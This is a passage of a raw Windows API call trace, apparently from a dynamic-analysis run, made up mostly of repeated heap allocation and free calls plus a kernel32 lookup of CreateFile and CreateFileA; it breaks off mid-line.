[0185.625] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0185.625] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0185.625] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0185.625] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0185.625] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0185.625] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0185.625] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0185.626] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0185.626] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0185.626] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0185.626] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0185.626] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0185.626] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0185.626] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0185.626] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0185.626] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0185.626] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0185.626] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0185.626] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0185.626] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0185.626] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0185.626] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0185.626] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0185.626] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0185.626] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0185.626] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0185.626] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0185.626] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0185.626] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0185.626] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0185.626] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0185.626] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0185.626] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0185.626] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0185.626] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1890 [0185.626] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0185.627] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0185.627] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0185.627] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0185.627] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0185.627] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0185.627] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0185.627] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd870 [0185.627] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de858 [0185.627] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0185.627] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0185.627] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0185.627] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0185.627] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0185.627] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0185.627] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0185.627] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0185.627] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0185.627] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0185.627] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0185.627] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0185.627] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0185.627] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0185.627] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0185.627] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0185.627] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0185.627] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0185.627] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0185.627] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0185.627] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0185.628] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0185.628] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0185.628] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0185.628] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0185.628] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0185.628] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0185.628] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0185.628] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0185.628] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0185.628] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0185.628] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0185.628] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0185.628] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0185.628] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0185.628] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0185.628] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0185.628] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0185.628] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0185.628] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0185.628] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0185.628] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0185.628] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0185.628] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0185.628] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0185.628] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0185.628] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0185.628] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0185.628] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0185.629] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0a8 [0185.629] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0185.629] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0185.629] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0185.629] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0185.629] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0185.629] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0185.629] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0185.629] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0185.629] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0185.629] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0185.629] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0185.629] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0185.629] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0185.629] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0185.629] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0185.629] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0185.629] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0185.629] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0185.629] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0185.629] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0185.629] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0185.629] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0185.629] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0185.629] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0185.629] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0185.629] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0185.629] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0185.629] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0185.630] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0185.630] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c88 [0185.630] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0185.630] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0185.630] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0185.630] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0185.630] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0185.630] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0185.630] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0185.630] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0185.630] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0185.630] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0185.630] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0185.630] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0185.630] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0185.630] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0185.630] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0185.630] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0185.630] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0185.630] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0185.630] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0185.630] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0185.630] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0185.630] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0185.630] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0185.630] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0185.630] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0185.630] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0185.630] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0185.630] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0185.630] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0185.631] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0185.631] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0185.631] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0185.631] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0185.631] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0185.631] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0185.631] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0185.631] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0185.631] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0185.631] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0185.631] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0185.631] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0185.631] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0185.631] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0185.631] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0185.631] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0185.631] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0185.631] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0185.631] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0185.631] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0185.631] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0185.631] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0185.631] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0185.631] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0185.631] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0185.631] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0185.631] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0185.631] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0185.631] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0185.631] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0185.632] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0185.632] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0185.632] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0185.632] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0185.632] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0185.632] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0185.632] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0185.632] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0185.632] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0185.632] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0185.632] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0185.632] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0185.632] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0185.632] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0185.632] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0185.632] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0185.632] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0185.632] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0185.632] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0185.632] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0185.632] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0185.632] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0185.632] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0185.632] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0185.632] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9b9a60 [0185.632] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9b9a60, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0185.632] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0185.633] GetProcAddress (hModule=0x75990000, lpProcName="CreateFile") returned 0x0 [0185.633] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0185.633] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0185.633] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0185.633] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0185.633] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0185.633] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0185.633] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0185.633] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9a60 [0185.633] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x9b9a60, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0185.633] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0185.633] GetProcAddress (hModule=0x75990000, lpProcName="CreateFileA") returned 0x759a53c6 [0185.633] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0185.633] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0185.633] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0185.633] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0185.634] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0185.634] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0185.634] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0185.634] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0185.634] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0185.634] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0185.634] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0185.634] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0185.634] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, 